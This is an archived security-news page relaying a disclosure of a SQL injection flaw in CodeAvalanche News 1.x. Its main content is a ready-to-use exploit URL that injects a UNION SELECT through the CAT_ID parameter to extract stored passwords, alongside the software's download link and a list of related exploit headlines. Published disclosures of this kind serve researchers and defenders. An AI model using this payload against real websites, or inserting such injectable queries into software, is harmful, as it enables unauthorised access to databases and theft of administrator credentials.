_
_ _ 07.20.2008
 
_ Navigation: _
Main Page Technology Downloads Security Entertainment Videos
Search Site: Advanced
_
 
Login Login
 
Register Register
   
_ News Item

CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability

Feb 18 2007 13:26:21
Source: ace
vote bad  vote good
+1
#CodeAvalanche News SQL Injection#



Software: CodeAvalanche News



Download: http://www.aspindir.com/indir.asp?id=3315



Risk: High



Found by: beks



http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params

» full story @ source-link: ace
Related Articles:
» Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
» S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
» PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
» SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
_ Comments
Add Comment
You must be registered and logged in to add comments!

Register
Login
_ Sponsors

_ Sponsors